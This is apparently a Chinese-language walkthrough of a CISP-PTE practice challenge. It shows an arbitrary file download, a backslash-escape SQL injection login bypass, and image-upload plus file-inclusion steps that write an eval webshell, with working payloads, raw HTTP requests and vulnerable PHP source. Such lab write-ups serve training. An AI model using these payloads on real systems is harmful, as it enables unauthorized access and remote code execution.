CISP-PTE题目 whoami

wirteup

打开题目链接只有一个界面

http://hazelshishuaige.club:8056/

那就对这个目录进行 用了好几个工具扫 其中dirb扫出

爆出目录

http://hazelshishuaige.club:8056/www/

用御剑扫

这里没有扫完 但是需要的已经有了

一个登录页

http://hazelshishuaige.club:8056/www/index.php

phpinfo页 看web安装在哪里

http://hazelshishuaige.club:8056/www/in.php

还有最关键的一个test 这个是要传一个参数 file 大概率是一个文件

http://hazelshishuaige.club:8056/www/test.php

从Wappalyzer中得知 为Linux系统

ok 那么试试 /etc/passwd
执行下载了一个文件

那么 我们就用 bp去获取源码吧

先看我们这个test的文件 结合 in.php这个的phpinfo()来拿地址

POST /www/test.php HTTP/1.1
Host: hazelshishuaige.club:8056
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
Origin: http://hazelshishuaige.club:8056
Connection: close
Referer: http://hazelshishuaige.club:8056/www/test.php
Cookie: td_cookie=426092565
Upgrade-Insecure-Requests: 1
P
file=/var/www/html/www/test.php

<?php
echo '
<html>
<head>
<title>--==[[whoami]]==--</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<STYLE>
body {
	background: url(images/hack.jpg);
	background-size: 100% 670px;

}
</STYLE>
';

function file_download($download)
{
	if(file_exists($download))
				{
					header("Content-Description: File Transfer"); 
					
					header('Content-Transfer-Encoding: binary');
					header('Expires: 0');
					header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
					header('Pragma: public');
					header('Accept-Ranges: bytes');
					header('Content-Disposition: attachment; filename="'.basename($download).'"'); 
					header('Content-Length: ' . filesize($download));
					header('Content-Type: application/octet-stream'); 
					ob_clean();
					flush();
					readfile ($download);
				}
				else
				{
				echo "file not found";	
				}
	
}

if(isset($_POST['file']))
{
file_download($_POST['file']);
}
else{

echo '\'file\' parameter is empty. Please provide file path in \'file\' parameter ';
}

就是下载文件 接着看别的 看这个

http://hazelshishuaige.club:8056/www/index.php

源码如下

<?php
session_start();

include('c.php');
include('head.php');
if(@$_SESSION['logged']!=true)
{
	$_SESSION['logged']='';
	
}

if($_SESSION['logged']==true &&  $_SESSION['admin']!='')
{
	
	echo "you are logged in :)";
	header('Location: panel.php', true, 302);
}
else
{
echo '<div align=center style="margin:30px 0px 0px 0px;"><br><br><br>
<font size=8 face="comic sans ms">[----====[[ Who am I ]]====----]</font> 
<br><br>
Show me your skills <br>
<form method=post>
<br><br>
Username : <Input type=text name=un>  &nbsp Password : <input type=password name=ps> <br><br>
<input type=submit name=login value="let\'s login">';
}
if(isset($_POST['login']))
{
	$uname=str_replace('\'','',urldecode($_POST['un']));
	$pass=str_replace('\'','',urldecode($_POST['ps']));
	$run='select * from auth where  pass=\''.$pass.'\' and uname=\''.$uname.'\'';
	$result = mysqli_query($conn, $run);
if (mysqli_num_rows($result) > 0) {

$row = mysqli_fetch_assoc($result);
	   echo "You are allowed<br>";
	   $_SESSION['logged']=true;
	   $_SESSION['admin']=$row['username'];
	   
	 header('Location: panel.php', true, 302);
   
}
else
{
	echo "<script>alert('Try again');</script>";
}
	
}
echo "<font size=5 face=\"comic sans ms\" style=\"left: 0;bottom: 0; position: absolute;margin: 1px 1px 5px;\">Powered By CMS <font color=#ff9933>Pirates</font> ";

?>

注入点

$uname=str_replace('\'','',urldecode($_POST['un']));
$pass=str_replace('\'','',urldecode($_POST['ps']));
$run='select * from auth where  pass=\''.$pass.'\' and uname=\''.$uname.'\'';

怎么过呢 过滤单引号 无法闭合 ？
那么ok 最原始的方法 改这个sql语句 主要结构 就用 这个 转义符 \ 去做
payload如下

un=or+1%3D1+%23&ps=%5C&login=let%27s+login

就是密码 \ 账号 or 1=1 #
登录成功

接着看源码

<?php
session_start();

include('c.php');
include('head2.php');
if(@$_SESSION['logged']!=true )
{
		header('Location: index.php', true, 302);
		exit();
	
}



echo "Welcome to whoami ";
echo '<form method=post style="margin: 10px 0px 10px 95%;"><input type=submit name=lg value=Logout></form>';
if(isset($_POST['lg']))
{
	unset($_SESSION['logged']);
	unset($_SESSION['admin']);
	header('Location: index.php', true, 302);
}
echo '<hr><br>';

echo '<form method=post>

<select name=load>
    <option value="show">Show Users</option>
	<option value="add">Add User</option>
</select> 

 &nbsp<input type=submit name=continue value="continue"></form><br><br>';
if(isset($_POST['continue']))
{
	$dir=getcwd();
	$choice=str_replace('./','',$_POST['load']);
	
	if($choice==='add')
	{
       		include($dir.'/'.$choice.'.php');
			die();
	}
	
        if($choice==='show')
	{
        
		include($dir.'/'.$choice.'.php');
		die();
	}
	else
	{
		include($dir.'/'.$_POST['load']);
	}
	
}


if(isset($_POST['upload']))
{
	
	$name=mysqli_real_escape_string($conn,$_POST['name']);
	$address=mysqli_real_escape_string($conn,$_POST['address']);
	$id=mysqli_real_escape_string($conn,$_POST['id']);
	
	if(!empty($_FILES['image']['name']))
	{
		$iname=mysqli_real_escape_string($conn,$_FILES['image']['name']);
	$r=pathinfo($_FILES['image']['name'],PATHINFO_EXTENSION);
	$image=array('jpeg','jpg','gif','png');
	if(in_array($r,$image))
	{
		$finfo = @new finfo(FILEINFO_MIME); 
	$filetype = @$finfo->file($_FILES['image']['tmp_name']);
		if(preg_match('/image\/jpeg/',$filetype )  || preg_match('/image\/png/',$filetype ) || preg_match('/image\/gif/',$filetype ))
				{
					if (move_uploaded_file($_FILES['image']['tmp_name'], 'uploaded_images/'.$_FILES['image']['name']))
							 {
							  echo "Uploaded successfully ";
							  $update='insert into users(name,address,image,id) values(\''.$name.'\',\''.$address.'\',\''.$iname.'\', \''.$id.'\')'; 
							 mysqli_query($conn, $update);
							  
							}
				}
			else
			{
				echo "<br>i told you dear, only png,jpg and gif file are allowed";
			}
	}
	else
	{
		echo "<br>only png,jpg and gif file are allowed";
		
	}
}


}

?>

发现文件包含注入点 以及 一个白名单的文件上传


欧克 接着上传图片马包含它吧

http://hazelshishuaige.club:8056/www/uploaded_images/b.jpg

进行包含

POST /www/panel.php?cmd=%65%63%68%6f%20%27%3c%3f%70%68%70%20%40%65%76%61%6c%28%24%5f%50%4f%53%54%5b%27%63%6d%64%27%5d%29%3b%3f%3e%27%20%3e%3e%20%75%70%6c%6f%61%64%65%64%5f%69%6d%61%67%65%73%2f%73%68%65%6c%6c%2e%70%68%70 HTTP/1.1
Host: hazelshishuaige.club:8056
Content-Length: 44
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://hazelshishuaige.club:8056
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://hazelshishuaige.club:8056/www/panel.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: td_cookie=474608000; pma_lang=zh_CN; pmaUser-1=jHK6aFEzi7MFgS9dEObH61xhQMTn%2FERh4vyHSP2XoIlS5DyfB4p1vxqnoO0%3D; td_cookie=426336843; PHPSESSID=tkjpeq1rq45ar6jqi0fc1s54s4
Connection: close

load=uploaded_images/b.jpg&continue=continue

木马写进去了

http://hazelshishuaige.club:8056/www/uploaded_images/shell.php